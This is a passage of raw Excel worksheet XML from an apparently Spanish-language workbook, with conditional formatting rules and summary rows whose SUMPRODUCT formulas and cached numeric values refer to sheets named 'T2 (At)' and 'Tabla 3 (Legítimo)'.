      <formula>IF(AC3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="636" priority="64">
      <formula>IF(AC3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="635" priority="66">
      <formula>IF(AC3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AD3:AD79">
    <cfRule type="expression" dxfId="634" priority="63">
      <formula>IF(AD3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF3:AF79">
    <cfRule type="expression" dxfId="633" priority="5">
      <formula>IF(AF3&gt;AE3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AH3:AJ79">
    <cfRule type="expression" dxfId="632" priority="76">
      <formula>IF(AH3&lt;P3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AI3:AI79">
    <cfRule type="expression" dxfId="631" priority="82">
      <formula>IF(AI3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="630" priority="83">
      <formula>IF(AI3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="629" priority="84">
      <formula>IF(AI3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AJ3:AJ79">
    <cfRule type="expression" dxfId="628" priority="81">
      <formula>IF(AJ3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AK3:AL79">
    <cfRule type="expression" dxfId="627" priority="52">
      <formula>IF(OR(AK3&lt;S3,AK3&lt;Y3,AK3&lt;AE3),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AL3:AL79">
    <cfRule type="expression" dxfId="626" priority="6">
      <formula>IF(AL3&gt;AK3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AN3:AP79">
    <cfRule type="expression" dxfId="625" priority="51">
      <formula>IF(OR(AN3&lt;V3,AN3&lt;AB3,AN3&lt;AH3),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AO3:AO79">
    <cfRule type="expression" dxfId="624" priority="73">
      <formula>IF(AO3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="623" priority="74">
      <formula>IF(AO3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="622" priority="75">
      <formula>IF(AO3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AP3:AP79">
    <cfRule type="expression" dxfId="621" priority="72">
      <formula>IF(AP3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AR3:AR79">
    <cfRule type="expression" dxfId="620" priority="7">
      <formula>IF(AR3&gt;AQ3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AU3:AU79 BA3:BA79">
    <cfRule type="expression" dxfId="619" priority="111">
      <formula>IF(AU3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="618" priority="112">
      <formula>IF(AU3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AV3:AV79">
    <cfRule type="expression" dxfId="617" priority="91">
      <formula>IF(AV3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AW3:AX79">
    <cfRule type="expression" dxfId="616" priority="49">
      <formula>IF(AW3&lt;AQ3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AX3:AX79">
    <cfRule type="expression" dxfId="615" priority="8">
      <formula>IF(AX3&gt;AW3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AZ3:BB79">
    <cfRule type="expression" dxfId="614" priority="46">
      <formula>IF(AZ3&lt;AT3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BA3:BA79 AU3:AU79">
    <cfRule type="expression" dxfId="613" priority="110">
      <formula>IF(AU3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BB3:BB79">
    <cfRule type="expression" dxfId="612" priority="90">
      <formula>IF(BB3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BC3:BD79">
    <cfRule type="expression" dxfId="611" priority="44">
      <formula>IF(OR(BC3&lt;AQ3,BC3&lt;AW3),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BD3:BD79">
    <cfRule type="expression" dxfId="610" priority="9">
      <formula>IF(BD3&gt;BC3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BF3:BH79">
    <cfRule type="expression" dxfId="609" priority="41">
      <formula>IF(OR(BF3&lt;AT3,BF3&lt;AZ3),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BG3:BG79">
    <cfRule type="expression" dxfId="608" priority="107">
      <formula>IF(BG3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="607" priority="108">
      <formula>IF(BG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="606" priority="109">
      <formula>IF(BG3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BH3:BH79">
    <cfRule type="expression" dxfId="605" priority="89">
      <formula>IF(BH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BJ3:BJ79">
    <cfRule type="expression" dxfId="604" priority="10">
      <formula>IF(BJ3&gt;BI3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BM3:BM79">
    <cfRule type="expression" dxfId="603" priority="22">
      <formula>IF(BM3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="602" priority="24">
      <formula>IF(BM3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="601" priority="23">
      <formula>IF(BM3=0,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BN3:BN79">
    <cfRule type="expression" dxfId="600" priority="21">
      <formula>IF(BN3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BO3:BP79">
    <cfRule type="expression" dxfId="599" priority="15">
      <formula>IF(BO3&lt;BI3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BP3:BP79">
    <cfRule type="expression" dxfId="598" priority="11">
      <formula>IF(BP3&gt;BO3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BR3:BR79">
    <cfRule type="expression" dxfId="597" priority="14">
      <formula>IF(BR3&lt;BL3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BT3:BT79">
    <cfRule type="expression" dxfId="596" priority="20">
      <formula>IF(BT3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="595" priority="19">
      <formula>IF(BT3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="594" priority="18">
      <formula>IF(BT3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BT3:BU79">
    <cfRule type="expression" dxfId="593" priority="12">
      <formula>IF(BT3&lt;BM3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BU3:BU79">
    <cfRule type="expression" dxfId="592" priority="17">
      <formula>IF(BU3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BW3:BW79">
    <cfRule type="expression" dxfId="591" priority="25">
      <formula>IF(BW3&gt;BV3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="BZ3:BZ79">
    <cfRule type="expression" dxfId="590" priority="101">
      <formula>IF(BZ3=0.5,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="589" priority="102">
      <formula>IF(BZ3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="588" priority="103">
      <formula>IF(BZ3=1,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CA3:CA79">
    <cfRule type="expression" dxfId="587" priority="86">
      <formula>IF(CA3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CB3:CC79">
    <cfRule type="expression" dxfId="586" priority="30">
      <formula>IF(CB3&lt;BV3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CC3:CC79">
    <cfRule type="expression" dxfId="585" priority="26">
      <formula>IF(CC3&gt;CB3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CE3:CE79">
    <cfRule type="expression" dxfId="584" priority="29">
      <formula>IF(CE3&lt;BY3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CG3:CG79">
    <cfRule type="expression" dxfId="583" priority="35">
      <formula>IF(CG3=1,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="582" priority="34">
      <formula>IF(CG3=0,1,0)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="581" priority="33">
      <formula>IF(CG3=0.5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CG3:CH79">
    <cfRule type="expression" dxfId="580" priority="27">
      <formula>IF(CG3&lt;BZ3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="CH3:CH79">
    <cfRule type="expression" dxfId="579" priority="32">
      <formula>IF(CH3&gt;$E3,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>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FFD1DB"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:S36"/>
  <sheetViews>
    <sheetView zoomScale="115" zoomScaleNormal="115" workbookViewId="0">
      <pane xSplit="1" ySplit="2" topLeftCell="I3" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="K18" sqref="K18:N18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="25.140625" style="26" customWidth="1"/>
    <col min="2" max="2" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11.42578125" style="26" customWidth="1"/>
    <col min="4" max="4" width="11" style="26" customWidth="1"/>
    <col min="5" max="5" width="11.42578125" style="26" customWidth="1"/>
    <col min="6" max="7" width="11" style="26" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="11.42578125" style="26" customWidth="1"/>
    <col min="9" max="9" width="11" style="26" customWidth="1"/>
    <col min="10" max="10" width="11.85546875" style="214" customWidth="1"/>
    <col min="11" max="11" width="15" style="26" customWidth="1"/>
    <col min="12" max="12" width="22.28515625" style="26" customWidth="1"/>
    <col min="13" max="13" width="15.85546875" style="26" customWidth="1"/>
    <col min="14" max="14" width="28.5703125" style="26" customWidth="1"/>
    <col min="15" max="15" width="14.5703125" style="26" customWidth="1"/>
    <col min="16" max="16384" width="11.42578125" style="26"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:19">
      <c r="A1" s="146"/>
      <c r="B1" s="713" t="s">
        <v>2340</v>
      </c>
      <c r="C1" s="714"/>
      <c r="D1" s="714"/>
      <c r="E1" s="714"/>
      <c r="F1" s="714"/>
      <c r="G1" s="714"/>
      <c r="H1" s="714"/>
      <c r="I1" s="714"/>
      <c r="J1" s="714"/>
      <c r="K1" s="701" t="s">
        <v>680</v>
      </c>
      <c r="L1" s="702"/>
      <c r="M1" s="703" t="s">
        <v>681</v>
      </c>
      <c r="N1" s="704"/>
    </row>
    <row r="2" spans="1:19" ht="25.5" customHeight="1" thickBot="1">
      <c r="A2" s="442" t="s">
        <v>641</v>
      </c>
      <c r="B2" s="438" t="s">
        <v>0</v>
      </c>
      <c r="C2" s="21" t="s">
        <v>1</v>
      </c>
      <c r="D2" s="21" t="s">
        <v>2</v>
      </c>
      <c r="E2" s="21" t="s">
        <v>3</v>
      </c>
      <c r="F2" s="21" t="s">
        <v>1758</v>
      </c>
      <c r="G2" s="21" t="s">
        <v>1759</v>
      </c>
      <c r="H2" s="21" t="s">
        <v>1760</v>
      </c>
      <c r="I2" s="21" t="s">
        <v>1761</v>
      </c>
      <c r="J2" s="310" t="s">
        <v>1762</v>
      </c>
      <c r="K2" s="416" t="s">
        <v>2341</v>
      </c>
      <c r="L2" s="417" t="s">
        <v>2434</v>
      </c>
      <c r="M2" s="419" t="s">
        <v>2341</v>
      </c>
      <c r="N2" s="420" t="s">
        <v>2435</v>
      </c>
      <c r="S2" s="214"/>
    </row>
    <row r="3" spans="1:19" ht="15" customHeight="1">
      <c r="A3" s="443" t="s">
        <v>4463</v>
      </c>
      <c r="B3" s="717">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$E$79</f>
        <v>3573695</v>
      </c>
      <c r="C3" s="717"/>
      <c r="D3" s="717"/>
      <c r="E3" s="717"/>
      <c r="F3" s="717"/>
      <c r="G3" s="717"/>
      <c r="H3" s="717"/>
      <c r="I3" s="717"/>
      <c r="J3" s="717"/>
      <c r="K3" s="717"/>
      <c r="L3" s="717"/>
      <c r="M3" s="717"/>
      <c r="N3" s="718"/>
      <c r="S3" s="214"/>
    </row>
    <row r="4" spans="1:19" ht="15" customHeight="1">
      <c r="A4" s="444" t="s">
        <v>4464</v>
      </c>
      <c r="B4" s="719">
        <f>'Tabla 3 (Legítimo)'!$B$3</f>
        <v>78694206</v>
      </c>
      <c r="C4" s="719"/>
      <c r="D4" s="719"/>
      <c r="E4" s="719"/>
      <c r="F4" s="719"/>
      <c r="G4" s="719"/>
      <c r="H4" s="719"/>
      <c r="I4" s="719"/>
      <c r="J4" s="719"/>
      <c r="K4" s="719"/>
      <c r="L4" s="719"/>
      <c r="M4" s="719"/>
      <c r="N4" s="720"/>
      <c r="S4" s="214"/>
    </row>
    <row r="5" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A5" s="445" t="s">
        <v>4465</v>
      </c>
      <c r="B5" s="719">
        <f>$B$4+$B$3</f>
        <v>82267901</v>
      </c>
      <c r="C5" s="719"/>
      <c r="D5" s="719"/>
      <c r="E5" s="721"/>
      <c r="F5" s="721"/>
      <c r="G5" s="721"/>
      <c r="H5" s="719"/>
      <c r="I5" s="719"/>
      <c r="J5" s="719"/>
      <c r="K5" s="719"/>
      <c r="L5" s="719"/>
      <c r="M5" s="719"/>
      <c r="N5" s="720"/>
      <c r="O5" s="725" t="s">
        <v>658</v>
      </c>
      <c r="P5" s="726"/>
      <c r="S5" s="214"/>
    </row>
    <row r="6" spans="1:19" ht="15" customHeight="1">
      <c r="A6" s="478" t="s">
        <v>4453</v>
      </c>
      <c r="B6" s="439">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!K3:K78)</f>
        <v>80</v>
      </c>
      <c r="C6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!Q3:Q78)</f>
        <v>51</v>
      </c>
      <c r="D6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!W3:W78)</f>
        <v>88</v>
      </c>
      <c r="E6" s="612">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!AC3:AC78)</f>
        <v>104</v>
      </c>
      <c r="F6" s="612">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!AI3:AI78)</f>
        <v>110</v>
      </c>
      <c r="G6" s="612">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!AO3:AO78)</f>
        <v>110</v>
      </c>
      <c r="H6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!AU3:AU78)</f>
        <v>1</v>
      </c>
      <c r="I6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!BA3:BA78)</f>
        <v>56</v>
      </c>
      <c r="J6" s="44">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!BG3:BG78)</f>
        <v>97</v>
      </c>
      <c r="K6" s="433">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!BM3:BM78)</f>
        <v>66</v>
      </c>
      <c r="L6" s="609">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!BT3:BT78)</f>
        <v>105</v>
      </c>
      <c r="M6" s="610">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!BZ3:BZ78)</f>
        <v>76</v>
      </c>
      <c r="N6" s="609">
        <f>SUMPRODUCT('T2 (At) S&lt;=4, FG&gt;=1'!$D3:$D$78,'T2 (At) S&lt;=4, FG&gt;=1'!CG3:CG78)</f>
        <v>76</v>
      </c>
      <c r="O6" s="723" t="s">
        <v>2491</v>
      </c>
      <c r="P6" s="724"/>
      <c r="S6" s="214"/>
    </row>
    <row r="7" spans="1:19" ht="15" customHeight="1">
      <c r="A7" s="479" t="s">
        <v>4454</v>
      </c>
      <c r="B7" s="440">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - B6</f>
        <v>30</v>
      </c>
      <c r="C7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - C6</f>
        <v>59</v>
      </c>
      <c r="D7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - D6</f>
        <v>22</v>
      </c>
      <c r="E7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - E6</f>
        <v>6</v>
      </c>
      <c r="F7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - F6</f>
        <v>0</v>
      </c>
      <c r="G7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - G6</f>
        <v>0</v>
      </c>
      <c r="H7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - H6</f>
        <v>109</v>
      </c>
      <c r="I7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - I6</f>
        <v>54</v>
      </c>
      <c r="J7" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - J6</f>
        <v>13</v>
      </c>
      <c r="K7" s="434">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - K6</f>
        <v>44</v>
      </c>
      <c r="L7" s="607">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - L6</f>
        <v>5</v>
      </c>
      <c r="M7" s="434">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - M6</f>
        <v>34</v>
      </c>
      <c r="N7" s="607">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!$D$79 - N6</f>
        <v>34</v>
      </c>
      <c r="O7" s="723"/>
      <c r="P7" s="724"/>
      <c r="S7" s="214"/>
    </row>
    <row r="8" spans="1:19" ht="15" customHeight="1">
      <c r="A8" s="446" t="s">
        <v>4148</v>
      </c>
      <c r="B8" s="519">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!G79</f>
        <v>37259</v>
      </c>
      <c r="C8" s="520">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!M79</f>
        <v>13179</v>
      </c>
      <c r="D8" s="520">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!S79</f>
        <v>50438</v>
      </c>
      <c r="E8" s="586">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!Y79</f>
        <v>1799319</v>
      </c>
      <c r="F8" s="586">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AE79</f>
        <v>367811</v>
      </c>
      <c r="G8" s="586">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AK79</f>
        <v>2157395</v>
      </c>
      <c r="H8" s="520">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AQ79</f>
        <v>16</v>
      </c>
      <c r="I8" s="284">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AW79</f>
        <v>25704</v>
      </c>
      <c r="J8" s="304">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BC79</f>
        <v>76126</v>
      </c>
      <c r="K8" s="460">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BI79</f>
        <v>656996</v>
      </c>
      <c r="L8" s="607">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BO79</f>
        <v>1989445</v>
      </c>
      <c r="M8" s="460">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BV79</f>
        <v>3993092</v>
      </c>
      <c r="N8" s="607">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!CB79</f>
        <v>7986184</v>
      </c>
      <c r="O8" s="556"/>
      <c r="S8" s="214"/>
    </row>
    <row r="9" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A9" s="565" t="s">
        <v>4455</v>
      </c>
      <c r="B9" s="523">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!H79</f>
        <v>13523</v>
      </c>
      <c r="C9" s="524">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!N79</f>
        <v>4968</v>
      </c>
      <c r="D9" s="524">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!T79</f>
        <v>18491</v>
      </c>
      <c r="E9" s="587">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!Z79</f>
        <v>383176</v>
      </c>
      <c r="F9" s="587">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AF79</f>
        <v>192858</v>
      </c>
      <c r="G9" s="587">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AL79</f>
        <v>572909</v>
      </c>
      <c r="H9" s="524">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AR79</f>
        <v>2</v>
      </c>
      <c r="I9" s="285">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!AX79</f>
        <v>8207</v>
      </c>
      <c r="J9" s="306">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BD79</f>
        <v>26696</v>
      </c>
      <c r="K9" s="461">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BJ79</f>
        <v>655847</v>
      </c>
      <c r="L9" s="608">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BP79</f>
        <v>1977351</v>
      </c>
      <c r="M9" s="461">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!BW79</f>
        <v>2558482</v>
      </c>
      <c r="N9" s="608">
        <f>'T2 (At) S&lt;=4, FG&gt;=1'!CC79</f>
        <v>5046652</v>
      </c>
      <c r="O9" s="554"/>
      <c r="S9" s="214"/>
    </row>
    <row r="10" spans="1:19" ht="15" customHeight="1" thickTop="1">
      <c r="A10" s="562" t="s">
        <v>4451</v>
      </c>
      <c r="B10" s="481">
        <f>'Tabla 3 (Legítimo)'!B$8</f>
        <v>3391362</v>
      </c>
      <c r="C10" s="482">
        <f>'Tabla 3 (Legítimo)'!C$8</f>
        <v>4719941</v>
      </c>
      <c r="D10" s="482">
        <f>'Tabla 3 (Legítimo)'!D$8</f>
        <v>7276338</v>
      </c>
      <c r="E10" s="482">
        <f>'Tabla 3 (Legítimo)'!E$8</f>
        <v>6879262</v>
      </c>
      <c r="F10" s="482">
        <f>'Tabla 3 (Legítimo)'!F$8</f>
        <v>6115454</v>
      </c>
      <c r="G10" s="482">
        <f>'Tabla 3 (Legítimo)'!G$8</f>
        <v>9478500</v>
      </c>
      <c r="H10" s="482">
        <f>'Tabla 3 (Legítimo)'!H$8</f>
        <v>6398</v>
      </c>
      <c r="I10" s="43">
        <f>'Tabla 3 (Legítimo)'!I$8</f>
        <v>7470907</v>
      </c>
      <c r="J10" s="305">
        <f>'Tabla 3 (Legítimo)'!J$8</f>
        <v>10855081</v>
      </c>
      <c r="K10" s="521">
        <f>'Tabla 3 (Legítimo)'!K$8</f>
        <v>4412536</v>
      </c>
      <c r="L10" s="609">
        <f>'Tabla 3 (Legítimo)'!L$8</f>
        <v>18610671</v>
      </c>
      <c r="M10" s="611">
        <f>'Tabla 3 (Legítimo)'!M$8</f>
        <v>28174</v>
      </c>
      <c r="N10" s="609">
        <f>'Tabla 3 (Legítimo)'!N$8</f>
        <v>28174</v>
      </c>
      <c r="O10" s="723" t="s">
        <v>2492</v>
      </c>
      <c r="P10" s="724"/>
      <c r="S10" s="214"/>
    </row>
    <row r="11" spans="1:19" ht="15" customHeight="1">
      <c r="A11" s="563" t="s">
        <v>4452</v>
      </c>
      <c r="B11" s="440">
        <f>'Tabla 3 (Legítimo)'!B9</f>
        <v>75302844</v>
      </c>
      <c r="C11" s="284">
        <f>'Tabla 3 (Legítimo)'!C9</f>
        <v>73974265</v>
      </c>
      <c r="D11" s="284">
        <f>'Tabla 3 (Legítimo)'!D9</f>
        <v>71417868</v>
      </c>
      <c r="E11" s="284">
        <f>'Tabla 3 (Legítimo)'!E9</f>
        <v>71814944</v>
      </c>
      <c r="F11" s="284">
        <f>'Tabla 3 (Legítimo)'!F9</f>
        <v>72578752</v>
      </c>
      <c r="G11" s="284">
        <f>'Tabla 3 (Legítimo)'!G9</f>
        <v>69215706</v>
      </c>
      <c r="H11" s="284">
        <f>'Tabla 3 (Legítimo)'!H9</f>
        <v>78687808</v>
      </c>
      <c r="I11" s="284">
        <f>'Tabla 3 (Legítimo)'!I9</f>
        <v>71223299</v>
      </c>
      <c r="J11" s="304">
        <f>'Tabla 3 (Legítimo)'!J9</f>
        <v>67839125</v>
      </c>
      <c r="K11" s="434">
        <f>'Tabla 3 (Legítimo)'!K9</f>
        <v>74281670</v>
      </c>
      <c r="L11" s="607">
        <f>'Tabla 3 (Legítimo)'!L9</f>
        <v>60083535</v>
      </c>
      <c r="M11" s="434">
        <f>'Tabla 3 (Legítimo)'!M9</f>
        <v>78666032</v>
      </c>
      <c r="N11" s="607">
        <f>'Tabla 3 (Legítimo)'!N9</f>
        <v>78666032</v>
      </c>
      <c r="O11" s="723"/>
      <c r="P11" s="724"/>
      <c r="S11" s="214"/>
    </row>
    <row r="12" spans="1:19" ht="15" customHeight="1">
      <c r="A12" s="446" t="s">
        <v>4149</v>
      </c>
      <c r="B12" s="440">
        <f>'Tabla 3 (Legítimo)'!B4</f>
        <v>9778069</v>
      </c>
      <c r="C12" s="284">
        <f>'Tabla 3 (Legítimo)'!C4</f>
        <v>5500009</v>
      </c>
      <c r="D12" s="284">
        <f>'Tabla 3 (Legítimo)'!D4</f>
        <v>15278078</v>
      </c>
      <c r="E12" s="586">
        <f>'Tabla 3 (Legítimo)'!E4</f>
        <v>15309135</v>
      </c>
      <c r="F12" s="586">
        <f>'Tabla 3 (Legítimo)'!F4</f>
        <v>14539188</v>
      </c>
      <c r="G12" s="586">
        <f>'Tabla 3 (Legítimo)'!G4</f>
        <v>29848323</v>
      </c>
      <c r="H12" s="284">
        <f>'Tabla 3 (Legítimo)'!H4</f>
        <v>6990</v>
      </c>
      <c r="I12" s="284">
        <f>'Tabla 3 (Legítimo)'!I4</f>
        <v>8738223</v>
      </c>
      <c r="J12" s="304">
        <f>'Tabla 3 (Legítimo)'!J4</f>
        <v>24009324</v>
      </c>
      <c r="K12" s="460">
        <f>'Tabla 3 (Legítimo)'!K4</f>
        <v>4445687</v>
      </c>
      <c r="L12" s="607">
        <f>'Tabla 3 (Legítimo)'!L4</f>
        <v>25983916</v>
      </c>
      <c r="M12" s="460">
        <f>'Tabla 3 (Legítimo)'!M4</f>
        <v>31273</v>
      </c>
      <c r="N12" s="607">
        <f>'Tabla 3 (Legítimo)'!N4</f>
        <v>31273</v>
      </c>
      <c r="O12" s="555"/>
      <c r="S12" s="214"/>
    </row>
    <row r="13" spans="1:19" ht="15" customHeight="1" thickBot="1">
      <c r="A13" s="565" t="s">
        <v>4456</v>
      </c>
      <c r="B13" s="441">
        <f>'Tabla 3 (Legítimo)'!B5</f>
        <v>8620288</v>
      </c>
      <c r="C13" s="285">
        <f>'Tabla 3 (Legítimo)'!C5</f>
        <v>5136879</v>
      </c>
      <c r="D13" s="285">
        <f>'Tabla 3 (Legítimo)'!D5</f>
        <v>13757167</v>
      </c>
      <c r="E13" s="592">
        <f>'Tabla 3 (Legítimo)'!E5</f>
        <v>13128811</v>
      </c>
      <c r="F13" s="592">
        <f>'Tabla 3 (Legítimo)'!F5</f>
        <v>13066562</v>
      </c>
      <c r="G13" s="592">
        <f>'Tabla 3 (Legítimo)'!G5</f>
        <v>26195373</v>
      </c>
      <c r="H13" s="285">
